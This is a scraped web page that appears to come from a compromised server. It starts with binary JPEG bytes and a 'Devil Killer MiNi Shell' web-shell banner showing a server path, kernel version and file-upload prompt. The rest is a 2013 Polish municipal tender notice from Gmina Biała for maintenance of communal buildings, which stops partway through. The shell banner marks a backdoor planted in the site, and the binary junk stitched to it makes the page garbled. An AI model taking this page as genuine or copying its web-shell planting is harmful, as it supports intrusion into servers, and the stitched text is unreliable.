JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131202/495384-N-2013.html

<p class="kh_header"><b>Biała: Techniczna obsługa stała budynków komunalnych (mieszkalnych) oraz lokali użytkowych w mieście i gminie Biała</b><br>
<b>Numer ogłoszenia: 495384 - 2013; data zamieszczenia: 02.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Biała , ul. Rynek 10/2, 48-210 Biała, woj. opolskie, tel. 77 4388542, 4388540, faks 77 4387679.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.biala.gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Techniczna obsługa stała budynków komunalnych (mieszkalnych) oraz lokali użytkowych w mieście i gminie Biała.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2. Przedmiotem zamówienia jest techniczna obsługa stała w zakresie robót budowlanych i instalacyjnych w budynkach i na zewnątrz budynków komunalnych (mieszkalnych) oraz lokali użytkowych w mieście i gminie Biała, polegające na usuwaniu awarii, wykonywaniu konserwacji oraz remontów o wartości zlecenia jednorazowo nie przekraczającej kwoty 10 000,00 zł netto.
3. Zamówienie jest podzielone na 2 następujące części:
Część nr 1. 
Techniczna obsługa stała w zakresie robót budowlanych i instalacyjnych w budynkach i na zewnątrz budynków komunalnych (mieszkalnych) w mieście i gminie Biała, polegającą na usuwaniu awarii, wykonywaniu konserwacji oraz remontów o wartości zlecenia jednorazowo nie przekraczającej kwoty 10 000,00 zł netto.
a) Techniczna obsługa stała świadczona będzie w budynkach komunalnych  będących własnością Gminy Biała,
b) Poprzez techniczną obsługę stałą rozumie się wykonywanie robót ogólnobudowlanych
c) Przez roboty budowlane rozumie się między innymi roboty: murarsko-tynkarskie, stolarskie, malarskie, ciesielskie, szklarskie, ślusarskie, dekarskie, betoniarskie, ziemne, zduńskie, oraz należy przez to rozumieć budowę, a także prace polegające na przebudowie, montażu, remoncie lub rozbiórce obiektu budowlanego
d) Przez roboty instalacyjne rozumie się roboty: wod - kan (zewnętrznej i wewnętrznej), c. o, elektryczne.
e) Przez awarię rozumie się: wydarzenie nagłe dotyczące uszkodzenia elementu budynku, którego wystąpienia  nie można było przewidzieć a wymagające natychmiastowej naprawy. 
f) Wykonawca wykona przedmiot zamówienia z materiałów własnych.
g) Prace należy wykonać zgodnie z ustaleniami Zamawiającego, zgodnie   z obowiązującymi przepisami i normami dotyczącymi przedmiotu zamówienia.
Czas reakcji na zgłoszenie do 1,5 godz. 
Wskaźnik kosztów transportu 1% - 2%.
Wysokość marży na zakupione przez Wykonawcę materiały 0%.
Zamawiający dopuszcza wykonania części robót przez podwykonawcę.
Wartość materiału użytego podczas zleconych prac rozliczona będzie na podstawie kserokopii faktur zakupu, według cen zakupu oferowanych przez bezpośredniego sprzedawcę (hurtownia, producent).
Podstawę wyceny zleconych robót stanowić będą normy określone w stosownych katalogach nakładów rzeczowych KNR.
Wykonawca zobowiązuje się wykonywać zakres zleconych prac zgodnie z dokonywanymi każdorazowo ustaleniami z Zamawiającym, zasadami współczesnej wiedzy technicznej, fachowo i rzetelnie, zgodnie z obowiązującymi przepisami  i normami dotyczącymi przedmiotu zamówienia.
Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo robót, mienia i osób postronnych oraz porządek na terenie zaplecza i placu budowy po ich protokolarnym przejęciu od Zamawiającego, jeżeli wymaga tego zapewnienie bezpieczeństwa podczas ich realizacji.
Wykonawca zapewnia zgodne z przepisami zabezpieczenie terenu, na którym wykonywać będzie przedmiot zamówienia oraz ponosi odpowiedzialność za ewentualne szkody wynikłe  z nieprawidłowego zabezpieczenia miejsca wykonywanych prac.
Wykonawca zobowiązuje się do uporządkowania terenu po zakończeniu remontu na swój koszt.
Wykonawca zgłosi do odbioru przez Zamawiającego wykonany przez siebie przedmiot umowy i będzie uczestniczył w odbiorze.
Wykonawca zobowiązuje się załatwić sprawy administracyjno- formalne umożliwiające prawidłowe rozpoczęcie prac, jeżeli wymagają tego stosowne przepisy.
Rozliczenie za wykonanie przedmiotu odbioru odbywać się będzie  fakturami   po  zakończeniu i odbiorze  robót. 
Do faktury Wykonawca załącza:
a)    kosztorys powykonawczy
- przy rozliczaniu robót kosztorysami powykonawczymi należy zastosować jednostkowe ceny materiałów, które nie mogą przekroczyć  średnich jednostkowych cen materiałów, publikowanych w  Informacjach o cenach materiałów.. SEKOCENBUD, aktualnych w dniu odbioru.
c)    protokół  odbioru robót potwierdzony przez obie strony.

Część 2. 
Techniczna obsługa stała w zakresie robót budowlanych i instalacyjnych  w budynkach i na zewnątrz lokali użytkowych w mieście i gminie Biała, polegającą na usuwaniu awarii, wykonywaniu konserwacji oraz remontów o wartości zlecenia jednorazowo nie przekraczającej kwoty 10 000,00 zł netto.
a) Techniczna obsługa stała świadczona będzie w budynkach komunalnych  będących własnością Gminy Biała,
b) Poprzez techniczną obsługę stałą rozumie się wykonywanie robót ogólnobudowlanych
c) Przez roboty budowlane rozumie się między innymi roboty: murarsko-tynkarskie, stolarskie, malarskie, ciesielskie, szklarskie, ślusarskie, dekarskie, betoniarskie, ziemne, zduńskie, oraz należy przez to rozumieć budowę, a także prace polegające na przebudowie, montażu, remoncie lub rozbiórce obiektu budowlanego
d)  Przez roboty instalacyjne rozumie się roboty: wod - kan (zewnętrznej i wewnętrznej), c. o, elektryczne.
e) Przez awarię rozumie się: wydarzenie nagłe dotyczące uszkodzenia elementu budynku, którego wystąpienia  nie można było przewidzieć a wymagające natychmiastowej naprawy. 
f) Wykonawca wykona przedmiot zamówienia z materiałów własnych.
g) Prace należy wykonać zgodnie z ustaleniami Zamawiającego, zgodnie                            z obowiązującymi przepisami i normami dotyczącymi przedmiotu zamówienia.
Czas reakcji na zgłoszenie do 1,5 godz. 
Wskaźnik kosztów transportu 1% - 2%.
Wysokość marży na zakupione przez Wykonawcę materiały 0%.
Zamawiający dopuszcza wykonania części robót przez podwykonawcę.
Wartość materiału użytego podczas zleconych prac rozliczona będzie na podstawie kserokopii faktur zakupu, według cen zakupu oferowanych przez bezpośredniego sprzedawcę (hurtownia, producent).
Podstawę wyceny zleconych robót stanowić będą normy określone w stosownych katalogach nakładów rzeczowych KNR.
Wykonawca zobowiązuje się wykonywać zakres zleconych prac zgodnie z dokonywanymi każdorazowo ustaleniami z Zamawiającym, zasadami współczesnej wiedzy technicznej, fachowo i rzetelnie, zgodnie z obowiązującymi przepisami  i normami dotyczącymi przedmiotu zamówienia.
Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo robót, mienia i osób postronnych oraz porządek na terenie zaplecza i placu budowy po ich protokolarnym przejęciu od Zamawiającego, jeżeli wymaga tego zapewnienie bezpieczeństwa podczas ich realizacji.
Wykonawca zapewnia zgodne z przepisami zabezpieczenie terenu, na którym wykonywać będzie przedmiot zamówienia oraz ponosi odpowiedzialność za ewentualne szkody wynikłe  z nieprawidłowego zabezpieczenia miejsca wykonywanych prac.
Wykonawca zobowiązuje się do uporządkowania terenu po zakończeniu remontu na swój koszt.
Wykonawca zgłosi do odbioru przez Zamawiającego wykonany przez siebie przedmiot umowy i będzie uczestniczył w odbiorze.
Wykonawca zobowiązuje się załatwić sprawy administracyjno- formalne umożliwiające prawidłowe rozpoczęcie prac, jeżeli wymagają tego stosowne przepisy.
Rozliczenie za wykonanie przedmiotu odbioru odbywać się będzie  fakturami   po  zakończeniu i odbiorze  robót. 
Do faktury Wykonawca załącza:
a)    kosztorys powykonawczy
- przy rozliczaniu robót kosztorysami powykonawczymi należy zastosować jednostkowe ceny materiałów, które nie mogą przekroczyć  średnich jednostkowych cen materiałów, publikowanych w  Informacjach o cenach materiałów..SEKOCENBUD, aktualnych w dniu odbioru.
c)    protokół  odbioru robót potwierdzony przez obie strony..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.33.00.00-9, 45.31.12.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz wykonanej co najmniej jednej usługi trwającej przez okres minimum 12 miesięcy, w zakresie technicznej obsługi stałej w budynkach i na zewnątrz budynków w zasobach komunalnych oraz świadczenie usług w budynkach i na zewnątrz budynków w zasobach komunalnych w okresie ostatnich trzech lat przed upływem terminu składania ofert na łączną wartość 100 000, 00 zł brutto, a jeżeli okres  prowadzenia działalności jest krótszy- w tym okresie, z podaniem ich wartości , dat wykonania oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie. Zamawiający uzna ten warunek za spełniony gdy Wykonawca załączy wykaz, o którym wyżej mowa wraz z dokumentem potwierdzającym, że te usługi zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz osób zdolnych do wykonania zamówienia posiadającymi odpowiednie uprawnienia:
- kierownik budowy,
(podstawa prawna: art. 14 ustawy Prawo budowlane z dnia 7.7.1994 r., - Dz. U. z 2010 r. Nr 243, poz. 1623 ze zm.) (załącznik nr 6 do SIWZ)

UWAGA: Ilekroć Zamawiający wymaga określonych uprawnień budowlanych na podstawie aktualnie obowiązującej ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (tekst jednolity Dz. U. z 2010 r. Nr 243, poz. 1623 z późn. zm.), rozumie przez to również odpowiadające im ważne uprawnienia budowlane, wydane na podstawie uprzednio obowiązujących przepisów prawa lub odpowiednich przepisów prawa państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wspólnym Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym, którzy nabyli prawo do wykonywania określonych zawodów regulowanych lub określonych działalności, jeżeli te kwalifikacje zostały uznane na zasadach przewidzianych w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę- załącznik nr 1 do SIWZ;
2) pełnomocnictwo (w przypadku podmiotów występujących wspólnie).
3)oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 ustawy Pzp</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Projekt umowy stanowi załącznik nr 7 do SIWZ.
2. Zamawiający informuje, iż przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1)  Zamawiający dopuszcza zmianę  umowy w przypadku zmiany unormowań prawnych powszechnie obowiązujących w szczególności:
a)  zmiany urzędowej stawki podatku VAT -  Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT. Strony dokonają odpowiedniej zmiany wynagrodzenia umownego - dotyczy to części wynagrodzenia za usługi, których w dniu zmiany stawki podatku VAT jeszcze nie wykonano,
b) zmiany przepisów prawa miejscowego,
c) wprowadzenia w życie po dniu podpisania umowy regulacji prawnych wywołujących potrzebę zmiany umowy.

2) Jeżeli w ramach wykazania spełniania warunków wiedzy i doświadczenia Wykonawca korzysta z zasobów podmiotu trzeciego, który będzie brał udział w realizacji części zamówienia jako podwykonawca - Zamawiający dopuszcza zmiany podwykonawcy, jeśli wykaże on, że posiada co najmniej takie doświadczenie, jakie wymagane było dla spełnienie warunku wiedzy i doświadczenia. 
3) Przewiduje się zmiany postanowień umowy, jeżeli zmiany te będą korzystne dla Zamawiającego lub konieczność wprowadzenia zmian będzie wynikać z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, w szczególności:
a) sposobu wykonania przedmiotu umowy, przy czym zmiana ta spowodowana może być okolicznościami zaistniałymi w trakcie realizacji przedmiotu umowy tj. uzasadniona zmiana w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron itp. 
b) oznaczenia danych dotyczących Zamawiającego i/lub Wykonawcy
c) zmiany zakresu części zamówienia powierzonej Podwykonawcom,
d) innych zmian, których nie można było przewidzieć w chwili zawarcia umowy i mających charakter zmian nieistotnych tj. nie odnoszących się do warunków, które gdyby zostały ujęte w ramach pierwotnej procedury udzielenia zamówienia, umożliwiłyby dopuszczenie innej oferty niż ta, która została pierwotnie dopuszczona. 

3. Przewidziane powyżej okoliczności stanowiące podstawę zmian do umowy, stanowią uprawnienie Zamawiającego nie zaś jego obowiązek wprowadzenia takich zmian.   
                       
4. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych:
1) sukcesja Wykonawcy tj. nabycie wszelkich praw i obowiązków w związku z następstwem prawnym,
2) zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy, 
3) zmiany danych  teleadresowych, 
4) zmiany osób wskazanych do kontaktów między Stronami,

5. Wszelkie zmiany muszą być dokonywane z zachowaniem przepisów ustawy Prawo zamówień publicznych (Dz. U. z 2010r., Nr 113, poz. 759, z poźn. zm.) tj. art.140 ust. 3 stanowiącego, że umowa podlega unieważnieniu w części wykraczającej poza określenie przedmiotu zamówienia zawartego w Specyfikacji Istotnych Warunków Zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.biala.gmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Biała
Rynek 10
48-210 Biała
Pokój nr 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.12.2013 godzina 09:00, miejsce: Gmina Biała
Rynek 10
48-210 Biała
Pokój nr 13 (Sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Techniczna obsługa stała w zakresie robót budowlanych i instalacyjnych w budynkach i na zewnątrz budynków komunalnych (mieszkalnych) w mieście i gminie Biała, polegającą na usuwaniu awarii, wykonywaniu konserwacji oraz remontów o wartości zlecenia jednorazowo nie przekraczającej kwoty 10 000,00 zł netto..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Techniczna obsługa stała świadczona będzie w budynkach komunalnych  będących własnością Gminy Biała,
b) Poprzez techniczną obsługę stałą rozumie się wykonywanie robót ogólnobudowlanych
c) Przez roboty budowlane rozumie się między innymi roboty: murarsko-tynkarskie, stolarskie, malarskie, ciesielskie, szklarskie, ślusarskie, dekarskie, betoniarskie, ziemne, zduńskie, oraz należy przez to rozumieć budowę, a także prace polegające na przebudowie, montażu, remoncie lub rozbiórce obiektu budowlanego
d) Przez roboty instalacyjne rozumie się roboty: wod - kan (zewnętrznej i wewnętrznej), c. o, elektryczne.
e) Przez awarię rozumie się: wydarzenie nagłe dotyczące uszkodzenia elementu budynku, którego wystąpienia  nie można było przewidzieć a wymagające natychmiastowej naprawy. 
f) Wykonawca wykona przedmiot zamówienia z materiałów własnych.
g) Prace należy wykonać zgodnie z ustaleniami Zamawiającego, zgodnie   z obowiązującymi przepisami i normami dotyczącymi przedmiotu zamówienia.
Czas reakcji na zgłoszenie do 1,5 godz. 
Wskaźnik kosztów transportu 1% - 2%.
Wysokość marży na zakupione przez Wykonawcę materiały 0%.
Zamawiający dopuszcza wykonania części robót przez podwykonawcę.
Wartość materiału użytego podczas zleconych prac rozliczona będzie na podstawie kserokopii faktur zakupu, według cen zakupu oferowanych przez bezpośredniego sprzedawcę (hurtownia, producent).
Podstawę wyceny zleconych robót stanowić będą normy określone w stosownych katalogach nakładów rzeczowych KNR.
Wykonawca zobowiązuje się wykonywać zakres zleconych prac zgodnie z dokonywanymi każdorazowo ustaleniami z Zamawiającym, zasadami współczesnej wiedzy technicznej, fachowo i rzetelnie, zgodnie z obowiązującymi przepisami  i normami dotyczącymi przedmiotu zamówienia.
Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo robót, mienia i osób postronnych oraz porządek na terenie zaplecza i placu budowy po ich protokolarnym przejęciu od Zamawiającego, jeżeli wymaga tego zapewnienie bezpieczeństwa podczas ich realizacji.
Wykonawca zapewnia zgodne z przepisami zabezpieczenie terenu, na którym wykonywać będzie przedmiot zamówienia oraz ponosi odpowiedzialność za ewentualne szkody wynikłe  z nieprawidłowego zabezpieczenia miejsca wykonywanych prac.
Wykonawca zobowiązuje się do uporządkowania terenu po zakończeniu remontu na swój koszt.
Wykonawca zgłosi do odbioru przez Zamawiającego wykonany przez siebie przedmiot umowy i będzie uczestniczył w odbiorze.
